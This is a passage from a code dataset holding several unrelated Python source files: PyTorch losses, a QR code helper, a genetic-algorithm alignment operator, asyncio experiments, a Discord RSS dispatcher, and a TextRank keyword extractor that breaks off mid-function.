predict.size(2) == target.size(1)\n assert predict.size(3) == target.size(2)\n n, c, h, w = predict.size()\n target_mask = (target >= 0) * (target != 255)\n target = target[target_mask]\n if not target.data.dim():\n return Variable(torch.zeros(1))\n predict = predict.transpose(1,2).transpose(2,3).contiguous()\n predict = predict[target_mask.view(n, h, w, 1).repeat(1, 1, 1, c)].view(-1, c)\n loss = F.cross_entropy(predict, target, size_average=True)\n return loss\n\nclass IOUloss_v1(nn.Module):\n def __init__(self, margin1=0.1, margin2=2.0, eps=1e-6):\n super(IOUloss_v1, self).__init__()\n self.margin1 = margin1\n self.margin2 = margin2\n self.eps = eps\n\n def forward(self, x1, x2, label):\n diff = x1 - x2\n dist = torch.pow(diff + self.eps, 2).sum(dim=1)\n dist_sq = torch.sqrt(dist)\n\n predict = dist_sq[:,:,:]>1.0\n gt = label[:,:,:]==1.0\n\n insection = (predict & gt).float()\n union = (predict | gt).float()\n iou_loss = 1 - (torch.sum(insection) / (torch.sum(union)))\n\n return iou_loss\n\nclass IOUloss_v2(nn.Module):\n def __init__(self, eps=1e-6):\n super(IOUloss_v2, self).__init__()\n self.eps = eps\n\n def forward(self, output, label):\n _, predicted = torch.max(output.data, dim=1)\n\n predict = predicted[:,:,:]==1\n gt = label[:,:,:]==1.0\n\n insection = (predict & gt).float()\n union = (predict | gt).float()\n iou_loss = 1 - (torch.sum(insection) / (torch.sum(union)))\n return iou_loss\n","sub_path":"utils/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"482336502","text":"#!/usr/bin/env python\n# coding:utf-8\nimport base64\nfrom io import BytesIO\n\nimport qrcode as qrc\n\n\ndef qrcode(data, version=None, error_correction='M', box_size=4.5, border=2.5, fit=False):\n \"\"\"\n makes qr image using qrcode as qrc See documentation for qrcode package for info\n taken from: https://github.com/agnerio/Flask-QRcode/blob/master/flask_qrcode/__init__.py\n \"\"\"\n correction_levels = {\n 'L': qrc.constants.ERROR_CORRECT_L,\n 'M': qrc.constants.ERROR_CORRECT_M,\n 'Q': qrc.constants.ERROR_CORRECT_Q,\n 'H': qrc.constants.ERROR_CORRECT_H\n }\n\n qr = qrc.QRCode(\n version=version,\n error_correction=correction_levels[error_correction],\n box_size=box_size,\n border=border\n )\n qr.add_data(data)\n qr.make(fit=fit)\n\n # creates qrcode base64\n out = BytesIO()\n qr_img = qr.make_image()\n qr_img.save(out, 'PNG')\n\n return u\"data:image/png;base64,\" + base64.b64encode(out.getvalue()).decode('ascii')\n","sub_path":"10-two-factor-authentication/app/qr.py","file_name":"qr.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"579099399","text":"from optparse import OptionParser\n\n\nclass CLIOptions(OptionParser):\n \"\"\"\n Command line interface options parser.\n \"\"\"\n def __init__(self, *args, **kwargs):\n OptionParser.__init__(self, *args, **kwargs)\n self.add_option(\n \"-c\", \"--config\", dest=\"configfile\",\n help=\"Configuration file.\", default=\"/etc/temboard/temboard.conf\")\n\n\nclass temboarduiOptions(CLIOptions):\n \"\"\"\n temboard options parser.\n \"\"\"\n def __init__(self, *args, **kwargs):\n CLIOptions.__init__(self, *args, **kwargs)\n self.add_option(\n \"-d\", \"--daemon\", dest=\"daemon\", action=\"store_true\",\n help=\"Run in background.\", default=False)\n self.add_option(\n \"-p\", \"--pid-file\", dest=\"pidfile\",\n help=\"PID file.\", default=\"/run/temboard.pid\")\n self.add_option(\n \"--debug\",\n action=\"store_true\", dest=\"debug\", default=False,\n help=\"Debug mode for development.\")\n","sub_path":"temboardui/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"437361378","text":"from random import randint\nfrom random import sample\nfrom Individual import Individual\n\n\n\"\"\"\nClasse de operadores do saga\n\"\"\"\nclass Operator():\n \"\"\"\n Construtor da classe operador, armazena os operadores em um dicionario, a fim de serem selecionados\n aleatoriamente pelos seus indices.\n \"\"\"\n def __init__(self):\n self.function_dict = {\n 1: self.crossover_one_point, # 2 parents\n 2: self.crossover_uniform, # 2 parents\n 3: self.block_shuffling_left, # 1 parents\n 4: self.block_shuffling_vertically, # 1 parents\n }\n self.selected_op = 0 # guarda a key do operador selecionado\n\n\n \"\"\"\n Seleciona de por meio da roleta um operador e retorna o numero de pais a serem selecionados\n \"\"\"\n def select_operator(self):\n dict_len = len(self.function_dict)\n\n # seleciona o operador aleatoriamente\n self.selected_op = randint(1,dict_len)\n # self.selected_op = 1\n\n # Verifica se o operator escolhido necessita de 1 parent\n if self.selected_op == 3 or self.selected_op == 4:\n return 1\n else:\n return 2\n\n\n \"\"\"\n Executa o operador selecionado, retornando os filhos gerados pelo operador\n \"\"\"\n def run_operator(self, parent1, parent2 = None):\n if parent2 is not None:\n self.function_dict[self.selected_op](parent1, parent2)\n else:\n self.function_dict[self.selected_op](parent1)\n\n\n \"\"\"\n Operador de crossover de um ponto, retorna os filhos do crossover\n \"\"\"\n def crossover_one_point(self, individual1, individual2):\n # print(\"Individual1 = %s\" % individual1.toString())\n # print(\"Individual2 = %s\\n\" % individual2.toString())\n chromosome1 = individual1.getChromosome()\n chromosome2 = individual2.getChromosome()\n \n num_seq = len(chromosome1)\n point = randint(1, len(chromosome1[0])-1) # ponto de corte\n\n # primeiro cromossomo\n part1_a = []\n part1_b = []\n\n # segundo cromossomo\n part2_a = []\n part2_b = []\n\n # divide o primeiro cromossomo\n for row in chromosome1:\n part1_a.append(row[0:point])\n part1_b.append(row[point::])\n\n num_char_a = []\n for row in part1_a:\n num_char_a.append(len(row) - row.count('-'))\n\n # Divide o segundo cromossomo\n for i, row in enumerate(chromosome2):\n cont = 0\n # print(\"num_char_a[i] = %d\\nrow %s\\n\" % (num_char_a[i], row))\n for j, char in enumerate(row):\n if char != '-':\n cont += 1\n if not num_char_a[i]:\n part2_a.append('')\n part2_b.append(row)\n elif cont == num_char_a[i]:\n part2_a.append(row[0:j+1])\n part2_b.append(row[j+1::])\n break\n \n # Encontra o tamnho da segunda sequencia lado A\n size_seq_A = 0\n for i in part2_a:\n size_seq_A = max(size_seq_A, len(i))\n\n # Encontra o tamnho da segunda sequencia lado B\n size_seq_B = 0\n for i in part2_b:\n size_seq_B = max(size_seq_B, len(i))\n\n # Ajusta o tamanho da segunda sequencia lado A\n for i in range(0, len(part2_a)):\n while len(part2_a[i]) < size_seq_A:\n part2_a[i] = part2_a[i] + '-'\n\n # Ajusta o tamanho da segunda sequencia lado B\n for i in range(0, len(part2_b)):\n while len(part2_b[i]) < size_seq_B:\n part2_b[i] = '-' + part2_b[i]\n\n # filhos a serem gerados\n child1 = []\n child2 = []\n\n # realiza a juncao dos cromossomos\n # print(\"part1_a %s\\npart1_b %s\" % (part1_a, part1_b))\n # print(\"part2_a %s\\npart2_b %s\\n\" % (part2_a, part2_b))\n for i in range(0, num_seq):\n child1.append(part1_a[i]+part2_b[i])\n child2.append(part2_a[i]+part1_b[i])\n\n # atribui os novos cromossomos aos individuos\n individual1.setChromosome(child1)\n individual2.setChromosome(child2)\n\n \"\"\"\n Operador de crossover uniforme, realiza o crossover uniforme entre dois cromossomos\n \"\"\"\n def crossover_uniform(self, individual1, individual2):\n # print(\"---------------OPERADOR CROSSOVER UNIFORME---------------\")\n chromosome1 = individual1.getChromosome()\n chromosome2 = individual2.getChromosome()\n position = []\n\n num_seq1 = len(chromosome1)\n # num_seq2 = len(chromosome2) (não esta sendo usada)\n\n # cromossomo dos filhos\n child1_chromosome = []\n child2_chromosome = []\n\n for x in range(0, num_seq1):\n tam_min = min(len(chromosome1[x]), len(chromosome2[x]))\n chrom1_size = len(chromosome1[x])\n chrom2_size = len(chromosome2[x])\n\n sequencia_chromosome1 = chromosome1[x]\n sequencia_chromosome2 = chromosome2[x]\n \n for y in range(0, tam_min):\n if sequencia_chromosome1[y] == sequencia_chromosome2[y]: #Condição para o mapeamento\n position.append(y) # Armazenar as posições que corresponde tanto ao pai1 como ao pai2\n # print(\"PAI 1: %s\" % sequencia_chromosome1)\n # print(\"PAI 2: %s\" % sequencia_chromosome2)\n # print('MAPEAMENTO: %s' % position)\n\n if len(position) < 2:\n return None\n x = sample(position, 2) \n\n # print (\"ESCOLHIDOS: %s\" % x)\n del position[:]\n child1_part1 = []\n child1_part2 = []\n child1_part3 = []\n child1_part4 = []\n child1_part5 = []\n \n child2_part1 = []\n child2_part2 = []\n child2_part3 = []\n child2_part4 = []\n child2_part5 = []\n\n menor_posicao = min(x[0], x[1])\n maior_posicao = max(x[0], x[1])\n\n # Para fazer a permutação dos pontos\n for y in range(0, chrom1_size):\n if y < menor_posicao:\n child1_part1.append(sequencia_chromosome1[y])\n if y == menor_posicao:\n child1_part2.append(sequencia_chromosome1[y])\n if y > menor_posicao and y < maior_posicao:\n child1_part3.append(sequencia_chromosome1[y])\n if y == maior_posicao:\n child1_part4.append(sequencia_chromosome1[y])\n if y > maior_posicao:\n child1_part5.append(sequencia_chromosome1[y])\n \n for y in range(0, chrom2_size):\n if y < menor_posicao:\n child2_part1.append(sequencia_chromosome2[y])\n if y == menor_posicao:\n child2_part2.append(sequencia_chromosome2[y])\n if y > menor_posicao and y < maior_posicao:\n child2_part3.append(sequencia_chromosome2[y])\n if y == maior_posicao:\n child2_part4.append(sequencia_chromosome2[y])\n if y > maior_posicao:\n child2_part5.append(sequencia_chromosome2[y])\n \n child1 = child1_part1+child1_part2+child2_part3+child1_part4+child1_part5\n child2 = child2_part1+child2_part2+child1_part3+child2_part4+child2_part5\n\n for y in range(0, len(child1)):\n if y == 0:\n teste = child1[y]\n else:\n teste += child1[y]\n # print(\"CHILD 1: %s\" % teste)\n child1_chromosome.append(teste)\n\n for y in range(0, len(child2)):\n if y == 0:\n teste = child2[y]\n else:\n teste += child2[y]\n # print(\"CHILD 2: %s\" % teste)\n # print(\"\\n\")\n child2_chromosome.append(teste)\n\n individual1.setChromosome(child1_chromosome)\n individual2.setChromosome(child2_chromosome)\n\n\n \"\"\"\n Implementação do operador block shuffling 1\n \"\"\"\n def block_shuffling_left(self, individual1):\n # Para o operador block shuffling mover um bloco cheio de lacunas uma posição para esquerda\n # print(\"-----------MOVER BLOCO DE LACUNAS PARA UMA POSIÇÃO NA ESQUERDA-----------\")\n sequence = individual1.getChromosome()\n amount_sequence = len(sequence)\n child_chromosome = []\n for x in range(0, amount_sequence):\n size_sequence = len(sequence[x]) \n child = []\n # var = \"\"\n # contador = 0\n for y in range(0, size_sequence): # Para identificar os gap e os mover\n if sequence[x][y] == \"-\":\n if y != 0:\n temp = child[len(child)-1] \n child.pop()\n child.append(sequence[x][y])\n child.append(temp)\n else:\n # contador = 1\n var = sequence[x][size_sequence-1]\n child.append(sequence[x][y])\n else:\n child.append(sequence[x][y])\n for y in range(0, len(child)):\n if y == 0:\n child_new = child[y]\n else:\n child_new += child[y]\n\n child_chromosome.append(child_new)\n # print(\"PAI: %s\" % sequence[x])\n # print(\"FILHO: %s\" % child_new)\n # print(\"\\n\")\n\n individual1.setChromosome(child_chromosome)\n\n\n \"\"\"\n Implementação do operador block shuffling 2\n \"\"\"\n def block_shuffling_vertically(self, individual1):\n # Para o operador block shuffling para dividir a metade um bloco de gaps e mover para esquerda\n # print(\"-----------VERTICAL GAPS-----------\")\n sequence = individual1.getChromosome()\n amount_sequence = len(sequence)\n contador1 = 0\n contador2 = 0\n child_chromosome = []\n for x in range(0, amount_sequence):\n \n size_sequence = len(sequence[x])\n child = []\n position = []\n for y in range(0, size_sequence):\n if sequence[x][y] == \"-\":\n position.append(y)\n contador1 += 1\n contador2 = 0\n else:\n contador2 = 1\n if contador1 > 1 and contador2 == 1:\n contador1 = 0\n contador2 = 0\n break\n \n if len(position) % 2 == 0:\n teste = len(position) / 2\n else:\n teste = len(position) / 2\n child = []\n temp = \"\"\n for y in range(0, size_sequence):\n if position == []:\n child.append(sequence[x][y])\n else:\n recebe = int(position[0]) + teste\n # print(\"CHILD: %s\" % child)\n if y == position[0]:\n if child != []:\n temp = child[len(child)-1]\n child.pop()\n \n if y == recebe:\n child.append(temp)\n child.append(sequence[x][y])\n else:\n child.append(sequence[x][y])\n \n for y in range(0, len(child)):\n if y == 0:\n child_new = child[y]\n else:\n child_new += child[y] \n del child\n #print(\"PAI:\\t%s\" % sequence[x]) \n #print(\"FILHO:\\t%s\" % child_new) \n #print(\"\\n\")\n child_chromosome.append(child_new)\n\n individual1.setChromosome(child_chromosome)","sub_path":"Operator.py","file_name":"Operator.py","file_ext":"py","file_size_in_byte":11963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"396323856","text":"from System.IO import *\n\nclass Feed:\n def __init__(self, Dir, NewsSourceName, RSSName, Module):\n self.Dir = Dir\n self.NewsSourceName = NewsSourceName\n self.RSSName = RSSName\n self.Module = Module\n\n def __str__(self):\n return self.Dir.FullName\n\ndef GetFeedsList():\n FeedsList = []\n for d in DirectoryInfo('Feeds').GetDirectories():\n NewsSourceName = d.Name\n for RSSdir in d.GetDirectories():\n for f in RSSdir.GetFiles():\n if f.Name.endswith('.rb') or f.Name.endswith('.py'):\n FeedsList.append(Feed(RSSdir, NewsSourceName, f.FullName.split('.')[0], f.FullName))\n return FeedsList\n\n##def GetFeedsList():\n## FeedsList = []\n## for d in DirectoryInfo('Feeds').GetDirectories():\n## NewsSourceName = ''\n## for f in d.GetFiles():\n## if f.FullName.endswith('.xml'):\n## NewsSourceName = GetNewsSourceName(f.FullName)\n## for RSSdir in d.GetDirectories():\n## RSSName = ''\n## for f in RSSdir.GetFiles():\n## if f.FullName.endswith('.xml'):\n## RSSName = GetRSSName(f.FullName)\n## FeedsList.append(Feed(NewsSourceName, RSSName, GetRSSModule(RSSdir.FullName)))\n## \n## return FeedsList\n##\n##def GetNewsSourceName(f):\n## with open(f) as f:\n## pass\n##\n##def GetRSSName(f):\n## pass\n##\n##def GetRSSModule(f):\n## pass\n","sub_path":"Feed.py","file_name":"Feed.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"37195516","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\nfrom std_msgs.msg import Float32\n\ndef callback(data):\n rospy.loginfo(rospy.get_caller_id() + \" I heard %s\", data.data)\n\ndef reader():\n\n\trospy.init_node('reader', anonymous=True)\n\n\trospy.Subscriber(\"convo\",Float32, callback)\n\t\n\trospy.spin()\n\t\nif __name__== '__main__':\n\treader()\n","sub_path":"scripts/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"643882083","text":"'''\r\n连续变量进行对数转换\r\n'''\r\nfrom util import dataset\r\nfrom scipy import stats\r\n\r\nprint('Loading data......')\r\ntrain = dataset.load('numeric', 'train').astype(float)\r\ntest = dataset.load('numeric', 'test').astype(float)\r\nnum_col = dataset.load('numeric', 'feature')\r\n\r\nfor col in num_col:\r\n if stats.skew(train[col]) > 0.25:\r\n values, lam = stats.boxcox(train[col].values+1)\r\n train[col] = values\r\n print(col)\r\n\r\n if stats.skew(test[col]) > 0.25:\r\n values, lam = stats.boxcox(test[col].values+1)\r\n test[col] = values\r\n\r\nprint(train.head())\r\nprint('='*20)\r\nprint(test.head())\r\nprint('='*20)\r\n\r\nprint('Saving data......')\r\ndataset(numeric_boxcox=train).save('train')\r\ndataset(numeric_boxcox=test).save('test')\r\n\r\nprint('Done!')\r\n","sub_path":"02Loan_Prediction/preprocessing/numeric-boxcox.py","file_name":"numeric-boxcox.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"516668564","text":"import asyncio\nimport random\n\n\nasync def add(start, end, wait):\n sum = 0\n for n in range(start, end):\n sum += n\n await asyncio.sleep(wait)\n print(f'Sum from {start} to {end} is {sum}')\n\n\nasync def main():\n task1 = asyncio.create_task(add(1, 10000001, 0))\n task2 = asyncio.create_task(add(2, 102, 2))\n task3 = asyncio.create_task(add(3, 10, 1))\n await asyncio.wait([task1, task2, task3])\n\n\nasync def slow_func():\n await asyncio.sleep(1)\n return 'answer'\n\n\nasync def failed_func():\n print('failed')\n await asyncio.sleep(2)\n raise Exception\n\n\nasync def test():\n response = slow_func()\n print(response)\n try:\n await failed_func()\n except Exception as e:\n print(e, await response)\n\n\nasync def say(what, when):\n await asyncio.sleep(when)\n print(what)\n\n\nasync def stop_after(loop, when):\n await asyncio.sleep(when)\n loop.stop()\n\n\nasync def long_say():\n index = 0\n while True:\n await say(f'{index}: hello', when=0.1)\n index += 1\n\n\nasync def print_every_second():\n while True:\n for i in range(60):\n print(f'{i}s')\n await asyncio.sleep(1)\n\n\nasync def print_every_minute():\n for i in range(1, 10):\n await asyncio.sleep(60)\n print(f'{i}min')\n\n\ndef time_runner():\n loop = asyncio.get_event_loop()\n loop.run_until_complete(\n asyncio.gather(print_every_second(), print_every_minute())\n )\n loop.close()\n\n\nasync def read():\n index = -1\n while True:\n index += 1\n print(f'reading: {index}')\n await asyncio.sleep(0.5)\n print(f'finished reading {index}')\n yield index\n\n\nasync def db_write(index):\n print(f'saving {index}')\n await asyncio.sleep(3)\n print(f'finished saving {index}')\n\n\nasync def rw_runner():\n async for item in read():\n await db_write(item)\n\n\ndef say_runner():\n loop = asyncio.get_event_loop()\n loop.run_until_complete(say('hello_world', 1))\n loop.close()\n\n\ndef say_runner_multiple():\n loop = asyncio.get_event_loop()\n loop.create_task(say('first hello', 2))\n loop.create_task(say('second hello', 1))\n loop.run_forever()\n loop.close()\n\n\ndef say_runner_long():\n loop = asyncio.get_event_loop()\n # loop.run_until_complete(long_say())\n loop.create_task(say('2 hello_world', 2))\n loop.create_task(long_say())\n loop.create_task(say('1 hello_world', 1))\n loop.run_forever()\n loop.close()\n\n\ndef say_stop_runner():\n loop = asyncio.get_event_loop()\n\n loop.create_task(say('first_hello', 2))\n loop.create_task(say('second_hello', 1))\n loop.create_task(say('third_hello', 4))\n loop.create_task(stop_after(loop, 3))\n\n loop.run_forever()\n loop.close()\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"reader/async_test.py","file_name":"async_test.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"190867339","text":"# -*- coding: utf-8 -*-\n# author:xls\n\"\"\"\n 成一个包含大写字母A-Z和数字0-9的随机4位验证码\n\"\"\"\nimport random\ncheck_code = ''\nfor i in range(4):\n current = random.randrange(4)\n if current == i:\n #生成一个随机整数\n temp = random.randrange(10)\n else:\n #生成一个随机的大写字母\n temp = chr(random.randrange(65, 91))\n check_code += str(temp)\nprint(check_code)","sub_path":"grammar/random_demo.py","file_name":"random_demo.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"328355305","text":"__all__ = ['add', 'dump', 'get', 'import', 'join', 'list', 'refresh', 'remove', 'removeall', 'setdate']\n\nfrom importlib import import_module\nfrom discord import Client, Message\n\nSHORT_HELP_TEXT = '$$$rss [...] - Gere feeds RSS (inclui subcomandos)'\n\ndef get_subcommand(name: str):\n \"\"\"\n Select subcommand\n \"\"\"\n return import_module('.' + name, 'hooks.commands.rss')\n\ndef get_subcommand_short_help(name: str) -> str:\n \"\"\"\n Show subcommand help\n \"\"\"\n return get_subcommand(name).SHORT_HELP_TEXT\n\ndef get_subcommand_long_help(name: str, **kwargs) -> str:\n \"\"\"\n Show subcommand long help\n \"\"\"\n return get_subcommand(name).help(**kwargs)\n\ndef help(**kwargs):\n \"\"\"\n Show help\n \"\"\"\n if not kwargs['args']:\n return str.join('\\n', map(get_subcommand_short_help, __all__))\n else:\n name = kwargs['args'][0]\n kwargs['args'] = kwargs['args'][1:]\n return get_subcommand_long_help(name, **kwargs)\n\nasync def run(client: Client, message: Message = None, **kwargs):\n \"\"\"\n Run command\n \"\"\"\n args = kwargs.get('args', [])\n if not args or args[0] == '':\n command = 'refresh'\n else:\n command = args[0]\n kwargs['args'] = args[1:]\n\n if command in __all__:\n command_module = get_subcommand(command)\n return await command_module.run(client, message, **kwargs)\n else:\n raise NotImplementedError('$$$rss {}'.format(command))\n","sub_path":"hooks/commands/rss/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"21688844","text":"from django.shortcuts import render\n\nfrom .models import Section, Navigation\n\n# Create your views here.\ndef index(request):\n section_list = Section.objects.all()\n navigation_list = Navigation.objects.all()\n\n context = {\n 'section_list': section_list,\n 'navigation_list': navigation_list,\n }\n\n return render(request, 'home/index.html', context)\n","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"171668668","text":"from datetime import timedelta\n# 第三方类\n# 自己的类\nfrom . import MetaClass\nfrom framework.database import DbOperation\nfrom utils.time import Datetime\nfrom utils.decorators import promise_do_once\nfrom settings import log\n\n\nclass IllegalDot1xUserJob(metaclass=MetaClass):\n next_time = Datetime.localtime()\n\n @classmethod\n def start(cls, force=False):\n now = Datetime.localtime()\n if not force and now < cls.next_time:\n return\n return\n # 下次运行: 每天早上7点\n cls.next_time = (now + timedelta(days=1)).replace(hour=7, minute=0, second=0, microsecond=0)\n #\n start_time = Datetime.localtime().replace(hour=0, minute=0, second=0, microsecond=0)\n end_time = start_time - timedelta(days=1)\n cls.doing(start_time=start_time, end_time=end_time)\n\n @classmethod\n @promise_do_once(file_name=__file__, func_name='doing')\n def doing(cls, start_time, end_time):\n # 所有public的AP\n public_ap = set()\n owner_ap = dict()\n sql = f\"\"\"\n SELECT * FROM ap_owner\n \"\"\"\n for row in DbOperation.select(sql):\n username = row['username']\n ap_mac = row['ap_mac']\n is_public = row['is_public']\n if is_public:\n public_ap.add(ap_mac)\n else:\n if username not in owner_ap:\n owner_ap[username] = set()\n owner_ap[username].add(ap_mac)\n\n # 按username统计连接最多的AP, 作为用户绑定的常用AP. 需排除is_public的AP\n username_ap = dict()\n # TODO 加上时间筛选, 30天内\n sql = f\"\"\"\n SELECT username, ap_mac, count(*) AS accept_count FROM stat_user GROUP BY username, ap_mac ORDER BY accept_count DESC\n \"\"\"\n log.info(f'sql: {sql}')\n for row in DbOperation.select(sql):\n username = row['username']\n ap_mac = row['ap_mac']\n accept_count = row['accept_count']\n if ap_mac in public_ap:\n continue\n if username in owner_ap:\n # 跳过已绑定用户的AP\n continue\n if username in username_ap:\n # 绑定关系已处理\n continue\n else:\n username_ap[username] = f'{ap_mac}:{accept_count}'\n\n # 按 username 统计, 告警: 不等于该ap_owner的username\n username_ap = dict()\n sql = f\"\"\"\n SELECT username, ap_mac, count(*) AS accept_count FROM stat_user GROUP BY username, ap_mac ORDER BY accept_count DESC\n \"\"\"\n log.info(f'sql: {sql}')\n for row in DbOperation.select(sql):\n username = row['username']\n ap_mac = row['ap_mac']\n accept_count = row['accept_count']\n #\n if username in owner_ap:\n # 跳过已绑定用户的AP\n continue\n if ap_mac in public_ap:\n # 公用AP跳过\n continue\n if f'{username}' in username_ap:\n # 绑定关系已处理\n continue\n else:\n username_ap[f'{username}'] = ap_mac\n\n log.info(f'public_ap: {public_ap}')\n log.info(f'owner_ap: {owner_ap}')\n log.info(f'username_ap: {username_ap}')\n log.info(f'username_ap: {username_ap}')\n for key, value in username_ap.items():\n username = key\n ap_mac = value\n correct_ap_mac, correct_accept_count = username_ap[username].split(':')\n if ap_mac == correct_ap_mac:\n continue\n log.error(f'username: {username} 应绑定AP: {correct_ap_mac}, 次数: {correct_accept_count}. 但现连接: {ap_mac}')\n # 发送slack统计消息\n # text = f'昨天充值金额: {today_sum/100} 元, 历史累计充值金额: {total_sum/100} 元'\n # Feishu.send_groud_msg(receiver_id=Feishu.FEISHU_CHARGE_CHAT_ID, text=text)\n","sub_path":"src/timer_processor/jobs/illegal_dot1x_user.py","file_name":"illegal_dot1x_user.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"240599282","text":"import argparse\nimport pandas as pd\nimport numpy as np\n\nimport argparse\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport os\nimport pickle\n# from data_loader import get_loader\nfrom build_vocab import Vocabulary\nfrom model_fastText import EncoderCNN, DecoderRNN\nfrom torch.nn.utils.rnn import pack_padded_sequence\nfrom torchvision import transforms\nfrom collections import OrderedDict\nimport spacy, string, nltk\nfrom spacy.lang.en.stop_words import STOP_WORDS\nimport gensim\nfrom nltk.corpus import stopwords\nfrom nltk.stem.wordnet import WordNetLemmatizer\n\n# Device configuration\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nnlp = spacy.load('en_core_web_sm')\nstopwords = set(stopwords.words('english'))\npunctuation = set(string.punctuation)\nlemmatize = WordNetLemmatizer()\nwords = set(nltk.corpus.words.words())\n\nclass TextRank4Keyword():\n \"\"\"Extract keywords from text\"\"\"\n\n def __init__(self):\n self.d = 0.85 # damping coefficient, usually is .85\n self.min_diff = 1e-5 # convergence threshold\n self.steps = 10 # iteration steps\n self.node_weight = None # save keywords and its weight\n\n\n def set_stopwords(self, stopwords):\n \"\"\"Set stop words\"\"\"\n for word in STOP_WORDS.union(set(stopwords)):\n lexeme = nlp.vocab[word]\n lexeme.is_stop = True\n\n def sentence_segment(self, doc, candidate_pos, lower):\n \"\"\"Store those words only in cadidate_pos\"\"\"\n sentences = []\n for sent in doc.sents:\n selected_words = []\n for token in sent:\n # Store words only with cadidate POS tag\n if token.pos_ in candidate_pos and token.is_stop is False:\n if lower is True:\n selected_words.append(token.text.lower())\n else:\n selected_words.append(token.text)\n sentences.append(selected_words)\n return sentences\n\n def get_vocab(self, sentences):\n \"\"\"Get all tokens\"\"\"\n vocab = OrderedDict()\n i = 0\n for sentence in sentences:\n for word in sentence:\n if word not in vocab:\n vocab[word] = i\n i += 1\n return vocab\n\n def get_token_pairs(self, window_size, sentences):\n \"\"\"Build token_pairs from windows in sentences\"\"\"\n token_pairs = list()\n for sentence in sentences:\n for i, word in enumerate(sentence):\n for j in range(i+1, i+window_size):\n if j >= len(sentence):\n break\n pair = (word, sentence[j])\n if pair not in token_pairs:\n token_pairs.append(pair)\n return token_pairs\n\n def symmetrize(self, a):\n return a + a.T - np.diag(a.diagonal())\n\n def get_matrix(self, vocab, token_pairs):\n \"\"\"Get normalized matrix\"\"\"\n # Build matrix\n vocab_size = len(vocab)\n g = np.zeros((vocab_size, vocab_size), dtype='float')\n for word1, word2 in token_pairs:\n i, j = vocab[word1], vocab[word2]\n g[i][j] = 1\n\n # Get Symmeric matrix\n g = self.symmetrize(g)\n\n # Normalize matrix by column\n norm = np.sum(g, axis=0)\n g_norm = np.divide(g, norm, where=norm!=0) # this is ignore the 0 element in norm\n\n return g_norm\n\n\n def get_keywords(self, number=10):\n \"\"\"Print top number keywords\"\"\"\n keywords = []\n node_weight = OrderedDict(sorted(self.node_weight.items(), key=lambda t: t[1], reverse=True))\n for i, (key, value) in enumerate(node_weight.items()):\n keywords.append(key)\n # print(key + ' - ' + str(value))\n if i > number:\n break\n return keywords\n\n def analyze(self, text,\n candidate_pos=['NOUN', 'PROPN'],\n window_size=4, lower=False, stopwords=list()):\n \"\"\"Main function to analyze text\"\"\"\n\n # Set stop words\n self.set_stopwords(stopwords)\n\n # Pare text by spaCy\n doc = nlp(text)\n\n # Filter sentences\n sentences = self.sentence_segment(doc, candidate_pos, lower) # list of list of words\n\n # Build vocabulary\n vocab = self.get_vocab(sentences)\n\n # Get token_pairs from windows\n token_pairs = self.get_token_pairs(window_size, sentences)\n\n # Get normalized matrix\n g = self.get_matrix(vocab, token_pairs)\n\n # Initionlization for weight(pagerank value)\n pr = np.array([1] * len(vocab))\n\n # Iteration\n previous_pr = 0\n for epoch in range(self.steps):\n pr = (1-self.d) + self.d * np.dot(g, pr)\n if abs(previous_pr - sum(pr)) < self.min_diff:\n break\n else:\n previous_pr = sum(pr)\n\n # Get weight for each node\n node_weight = dict()\n for word, index in vocab.items():\n node_weight[word] = pr[index]\n\n self.node_weight = node_weight\n\n\ndef unique_keywords(df):\n all_keywords = []\n values = []\n for item in df:\n # gensim.utils.simple_preprocess(item, deacc=True)\n doc = nlp(item)\n b = []\n for tok in doc:\n\t if tok.is_stop != True and tok.pos_ != 'SYM' and \\\n \t tok.tag_ != 'PRP' and tok.tag_ != 'PRP$' and \\\n tok.tag_ != '_SP' and tok.pos_ != 'NUM' and \\\n tok.dep_ != 'aux' and tok.dep_ != 'prep' and \\\n tok.dep_ != 'det' and tok.dep_ != 'cc' and \\\n tok.lemma_ != 'frac' and len(tok) != 1 and \\\n tok.lemma_.lower() in words and \\\n tok.lemma_.lower() not in stopwords and \\\n tok.lemma_.lower() not in punctuation:\n b.append(lemmatize.lemmatize(tok.lemma_.lower()))\n\n # print(b)\n # print(\" \".join(b))\n tr4w = TextRank4Keyword()\n tr4w.analyze(\" \".join(b), candidate_pos = ['NOUN', 'PROPN'], window_size=4, lower=False)\n keyword = tr4w.get_keywords(5)\n all_keywords.append(keyword)\n values = values + keyword\n return all_keywords, values\n\ndef genereate(args,key_words):\n # Create model directory\n if not os.path.exists(args.model_path):\n 